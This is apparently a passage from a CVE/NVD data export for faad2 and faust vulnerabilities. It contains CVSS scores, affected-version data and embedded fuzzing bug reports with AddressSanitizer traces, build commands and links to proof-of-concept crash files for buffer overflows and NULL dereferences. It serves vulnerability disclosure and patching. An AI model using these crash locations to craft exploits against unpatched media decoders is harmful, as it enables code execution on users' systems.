[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/issues/56" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5109" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/issues/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5109" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:faad2_project:faad2:*:*:*:*:*:*:*:*", "matchCriteriaId": "473E94D7-49A2-4FA4-82CD-726B2B84FF95", "versionEndExcluding": null, "versionEndIncluding": "2.10.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/knik0/faad2/issues/56
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "knik0", "faad2" ]
## System info Ubuntu x86_64, clang 6.0, faad (latest master [eb19fa](https://github.com/knik0/faad2/commit/eb19fa58e08ffad79fe4af09abc0b5a584b4e6e6)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --enable-shared=no ## Command line ./frontend/faad -w -b 5 @@ ## AddressSanitizer output ``` ================================================================= ==66437==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff84ab6078 at pc 0x0000004462d7 bp 0x7fff84ab5ee0 sp 0x7fff84ab5690 READ of size 41 at 0x7fff84ab6078 thread T0 #0 0x4462d6 in printf_common(void*, char const*, __va_list_tag*) (/home/seviezhou/faad2/frontend/faad+0x4462d6) #1 0x446f1b in __interceptor_vfprintf (/home/seviezhou/faad2/frontend/faad+0x446f1b) #2 0x446fe6 in fprintf (/home/seviezhou/faad2/frontend/faad+0x446fe6) #3 0x5150d3 in ftypin /home/seviezhou/faad2/frontend/mp4read.c:141:9 #4 0x5143fd in parse /home/seviezhou/faad2/frontend/mp4read.c:765:19 #5 0x5130f8 in mp4read_open /home/seviezhou/faad2/frontend/mp4read.c:999:9 #6 0x52a3a7 in decodeMP4file /home/seviezhou/faad2/frontend/main.c:830:9 #7 0x52a3a7 in faad_main /home/seviezhou/faad2/frontend/main.c:1323 #8 0x7f9c8fbc2b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41a669 in _start (/home/seviezhou/faad2/frontend/faad+0x41a669) Address 0x7fff84ab6078 is located in stack of thread T0 at offset 88 in frame #0 0x514aef in ftypin /home/seviezhou/faad2/frontend/mp4read.c:126 This frame has 2 object(s): [32, 36) 'u32.i' (line 104) [48, 88) 'buf' (line 128) <== Memory access at offset 88 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/seviezhou/faad2/frontend/faad+0x4462d6) in printf_common(void*, char const*, __va_list_tag*) Shadow bytes around the buggy address: 0x10007094ebb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007094ebc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007094ebd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007094ebe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007094ebf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007094ec00: 00 00 00 00 f1 f1 f1 f1 f8 f2 00 00 00 00 00[f3] 0x10007094ec10: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 0x10007094ec20: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 f8 f2 f8 f2 0x10007094ec30: f8 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 0x10007094ec40: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 0x10007094ec50: f8 f2 f2 f2 04 f3 f3 f3 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==66437==ABORTING ``` ## POC [stack-overflow-ftypin-mp4read-141.zip](https://github.com/knik0/faad2/files/5080176/stack-overflow-ftypin-mp4read-141.zip)
A stack-buffer-overflow in mp4read.c:141:9
https://api.github.com/repos/knik0/faad2/issues/56/comments
0
2020-08-16T07:27:58Z
2020-08-17T05:37:21Z
https://github.com/knik0/faad2/issues/56
679,706,876
56
2,518
CVE-2021-32274
2021-09-20T16:15:10.230
An issue was discovered in faad2 through 2.10.0. A heap-buffer-overflow exists in the function sbr_qmf_synthesis_64 located in sbr_qmf.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/issues/60" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5109" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/issues/60" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5109" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:faad2_project:faad2:*:*:*:*:*:*:*:*", "matchCriteriaId": "473E94D7-49A2-4FA4-82CD-726B2B84FF95", "versionEndExcluding": null, "versionEndIncluding": "2.10.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/knik0/faad2/issues/60
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "knik0", "faad2" ]
## System info Ubuntu x86_64, clang 6.0, faad (latest master [1073ae](https://github.com/knik0/faad2/commit/1073aeef823cafd844704389e9a497c257768e2f)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --enable-shared=no ## Command line ./frontend/faad -w -b 5 @@ ## AddressSanitizer output ``` NULL 174.805 secs, 5 ch, 48000 Hz ================================================================= ==39716==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000008900 at pc 0x0000005e19ba bp 0x7ffc780ef510 sp 0x7ffc780ef508 WRITE of size 4 at 0x621000008900 thread T0 #0 0x5e19b9 in sbr_qmf_synthesis_64 /home/seviezhou/faad2/libfaad/sbr_qmf.c:614:27 #1 0x59aeae in sbrDecodeSingleFrame /home/seviezhou/faad2/libfaad/sbr_dec.c:568:9 #2 0x5c2f81 in reconstruct_single_channel /home/seviezhou/faad2/libfaad/specrec.c:1070:22 #3 0x556c2e in single_lfe_channel_element /home/seviezhou/faad2/libfaad/syntax.c:643:14 #4 0x556c2e in decode_sce_lfe /home/seviezhou/faad2/libfaad/syntax.c:357 #5 0x55593a in raw_data_block /home/seviezhou/faad2/libfaad/syntax.c:550:13 #6 0x5389de in aac_frame_decode /home/seviezhou/faad2/libfaad/decoder.c:990:9 #7 0x52f738 in decodeMP4file /home/seviezhou/faad2/frontend/main.c:916:25 #8 0x52f738 in faad_main /home/seviezhou/faad2/frontend/main.c:1323 #9 0x7f3373f6783f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #10 0x41a698 in _start (/home/seviezhou/faad2/frontend/faad+0x41a698) 0x621000008900 is located 0 bytes to the right of 4096-byte region [0x621000007900,0x621000008900) allocated by thread T0 here: #0 0x4de8a8 in __interceptor_malloc /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88 #1 0x5c1a0b in allocate_single_channel /home/seviezhou/faad2/libfaad/specrec.c:736:48 #2 0x5c1a0b in reconstruct_single_channel /home/seviezhou/faad2/libfaad/specrec.c:934 #3 0x556c2e in single_lfe_channel_element /home/seviezhou/faad2/libfaad/syntax.c:643:14 #4 0x556c2e in decode_sce_lfe /home/seviezhou/faad2/libfaad/syntax.c:357 #5 0x55593a in raw_data_block /home/seviezhou/faad2/libfaad/syntax.c:550:13 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/faad2/libfaad/sbr_qmf.c:614:27 in sbr_qmf_synthesis_64 Shadow bytes around the buggy address: 0x0c427fff90d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff90e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff90f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff9100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff9110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c427fff9120:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff9130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff9140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff9150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff9160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff9170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==39716==ABORTING ``` ## POC [heap-overflow-sbr_qmf_synthesis_64-sbr_qmf-614.zip](https://github.com/knik0/faad2/files/5147065/heap-overflow-sbr_qmf_synthesis_64-sbr_qmf-614.zip)
A heap-buffer-overflow in sbr_qmf.c:614:27
https://api.github.com/repos/knik0/faad2/issues/60/comments
1
2020-08-30T15:53:54Z
2020-10-07T19:28:39Z
https://github.com/knik0/faad2/issues/60
688,743,058
60
2,519
CVE-2021-32275
2021-09-20T16:15:10.277
An issue was discovered in faust through v2.30.5. A NULL pointer dereference exists in the function CosPrim::computeSigOutput() located in cosprim.hh. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/grame-cncm/faust/issues/482" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/grame-cncm/faust/issues/482" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:grame:faust:*:*:*:*:*:*:*:*", "matchCriteriaId": "4DFD6F44-9ABE-4A8E-823E-7A45DE62126E", "versionEndExcluding": null, "versionEndIncluding": "2.30.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/grame-cncm/faust/issues/482
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "grame-cncm", "faust" ]
## System info Ubuntu x86_64, clang 6.0, faust (latest master [c236d2](https://github.com/grame-cncm/faust/commit/c236d23526de80c410f8014d36bb803af1da18b8)) ## Configure cmake . -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DINCLUDE_STATIC=on -DINCLUDE_HTTP=off -DINCLUDE_OSC=off ## Command line ./build/bin/faust -lang ocpp -o /tmp/faust -e -lcc -exp10 -lb -rb -mem -sd @@ ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==14194==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000c0666a bp 0x7f2f710fc2f0 sp 0x7f2f710fc010 T1) ==14194==The signal is caused by a READ memory access. ==14194==Hint: address points to the zero page. #0 0xc06669 in isNum(CTree* const&, num&) /home/seviezhou/faust/compiler/signals/signals.hh:266:18 #1 0xc5f65f in CosPrim::computeSigOutput(std::vector<CTree*, std::allocator<CTree*> > const&) /home/seviezhou/faust/compiler/extended/cosprim.hh:49:13 #2 0x10d1c54 in simplification(CTree*) /home/seviezhou/faust/compiler/normalize/simplify.cpp:98:24 #3 0x10cee26 in traced_simplification(CTree*) /home/seviezhou/faust/compiler/normalize/simplify.cpp:59:14 #4 0x10cee26 in sigMap(CTree*, CTree* (*)(CTree*), CTree*) /home/seviezhou/faust/compiler/normalize/simplify.cpp:235 #5 0x10cebcd in sigMap(CTree*, CTree* (*)(CTree*), CTree*) /home/seviezhou/faust/compiler/normalize/simplify.cpp:230:26 #6 0x10cebcd in sigMap(CTree*, CTree* (*)(CTree*), CTree*) /home/seviezhou/faust/compiler/normalize/simplify.cpp:230:26 #7 0x10cebcd in sigMap(CTree*, CTree* (*)(CTree*), CTree*) /home/seviezhou/faust/compiler/normalize/simplify.cpp:230:26 #8 0xdf1f71 in numericBoxSimplification(CTree*) /home/seviezhou/faust/compiler/evaluate/eval.cpp:1476:22 #9 0xdf1f71 in boxSimplification(CTree*) /home/seviezhou/faust/compiler/evaluate/eval.cpp:1436 #10 0xe0fad9 in insideBoxSimplification(CTree*) /home/seviezhou/faust/compiler/evaluate/eval.cpp:1639:19 #11 0xdf1c0c in numericBoxSimplification(CTree*) /home/seviezhou/faust/compiler/evaluate/eval.cpp:1488:18 #12 0xdf1c0c in boxSimplification(CTree*) /home/seviezhou/faust/compiler/evaluate/eval.cpp:1436 #13 0xe0fad9 in insideBoxSimplification(CTree*) /home/seviezhou/faust/compiler/evaluate/eval.cpp:1639:19 #14 0xdf1c0c in numericBoxSimplification(CTree*) /home/seviezhou/faust/compiler/evaluate/eval.cpp:1488:18 #15 0xdf1c0c in boxSimplification(CTree*) /home/seviezhou/faust/compiler/evaluate/eval.cpp:1436 #16 0xdef2ac in evalprocess(CTree*) /home/seviezhou/faust/compiler/evaluate/eval.cpp:99:13 #17 0xcbbc92 in evaluateBlockDiagram(CTree*, int&, int&) /home/seviezhou/faust/compiler/libcode.cpp:1146:20 #18 0xcbbc92 in threadEvaluateBlockDiagram(void*) /home/seviezhou/faust/compiler/libcode.cpp:197 #19 0xba40ae in __asan::AsanThread::ThreadStart(unsigned long, __sanitizer::atomic_uintptr_t*) (/home/seviezhou/faust/build/bin/faust+0xba40ae) #20 0x7f2f749d96da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da) #21 0x7f2f73d4088e in clone /build/glibc-OTsEL5/glibc-2.27/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95 AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/faust/compiler/signals/signals.hh:266:18 in isNum(CTree* const&, num&) Thread T1 created by T0 here: #0 0xaef650 in pthread_create (/home/seviezhou/faust/build/bin/faust+0xaef650) #1 0xcbb55e in callFun(void* (*)(void*)) /home/seviezhou/faust/compiler/libcode.cpp:186:5 #2 0xc8d86d in compileFaustFactoryAux(int, char const**, char const*, char const*, bool) /home/seviezhou/faust/compiler/libcode.cpp:1909:5 #3 0xc8c854 in compileFaustFactory(int, char const**, char const*, char const*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, bool) /home/seviezhou/faust/compiler/libcode.cpp:1982:9 #4 0xccc68d in main /home/seviezhou/faust/compiler/main.cpp:45:33 #5 0x7f2f73c40b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 ==14194==ABORTING ``` ## POC [SEGV-computeSigOutput-cosprim-49.zip](https://github.com/grame-cncm/faust/files/5127220/SEGV-computeSigOutput-cosprim-49.zip)
A Segmentation fault in cosprim.hh:49:13
https://api.github.com/repos/grame-cncm/faust/issues/482/comments
7
2020-08-26T02:30:17Z
2021-10-18T17:33:05Z
https://github.com/grame-cncm/faust/issues/482
685,956,370
482
2,520
CVE-2021-32276
2021-09-20T16:15:10.317
An issue was discovered in faad2 through 2.10.0. A NULL pointer dereference exists in the function get_sample() located in output.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/issues/58" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5109" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/issues/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5109" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:faad2_project:faad2:*:*:*:*:*:*:*:*", "matchCriteriaId": "473E94D7-49A2-4FA4-82CD-726B2B84FF95", "versionEndExcluding": null, "versionEndIncluding": "2.10.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/knik0/faad2/issues/58
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "knik0", "faad2" ]
## System info Ubuntu x86_64, clang 6.0, faad (latest master [1073ae](https://github.com/knik0/faad2/commit/1073aeef823cafd844704389e9a497c257768e2f)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --enable-shared=no ## Command line ./frontend/faad -w -b 5 @@ ## AddressSanitizer output ``` NULL 190.264 secs, 6 ch, 44100 Hz AddressSanitizer:DEADLYSIGNAL ================================================================= ==3662==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000546b64 bp 0x629000000200 sp 0x7ffed5a32ff0 T0) ==3662==The signal is caused by a READ memory access. ==3662==Hint: address points to the zero page. #0 0x546b63 in get_sample /home/seviezhou/faad2/libfaad/output.c:49:16 #1 0x546b63 in to_PCM_double /home/seviezhou/faad2/libfaad/output.c:390 #2 0x546b63 in output_to_PCM /home/seviezhou/faad2/libfaad/output.c:427 #3 0x53b8df in aac_frame_decode /home/seviezhou/faad2/libfaad/decoder.c:1176:21 #4 0x52f738 in decodeMP4file /home/seviezhou/faad2/frontend/main.c:916:25 #5 0x52f738 in faad_main /home/seviezhou/faad2/frontend/main.c:1323 #6 0x7fb2de93483f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #7 0x41a698 in _start (/home/seviezhou/faad2/frontend/faad+0x41a698) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/faad2/libfaad/output.c:49:16 in get_sample ==3662==ABORTING ``` ## POC [SEGV-get_sample-output-49.zip](https://github.com/knik0/faad2/files/5147027/SEGV-get_sample-output-49.zip)
A Segmentation fault in output.c:49:16
https://api.github.com/repos/knik0/faad2/issues/58/comments
0
2020-08-30T15:29:51Z
2020-10-09T15:48:34Z
https://github.com/knik0/faad2/issues/58
688,739,153
58
2,521
CVE-2021-32277
2021-09-20T16:15:10.363
An issue was discovered in faad2 through 2.10.0. A heap-buffer-overflow exists in the function sbr_qmf_analysis_32 located in sbr_qmf.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/issues/59" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5109" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/knik0/faad2/issues/59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5109" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:faad2_project:faad2:*:*:*:*:*:*:*:*", "matchCriteriaId": "473E94D7-49A2-4FA4-82CD-726B2B84FF95", "versionEndExcluding": null, "versionEndIncluding": "2.10.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/knik0/faad2/issues/59
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "knik0", "faad2" ]
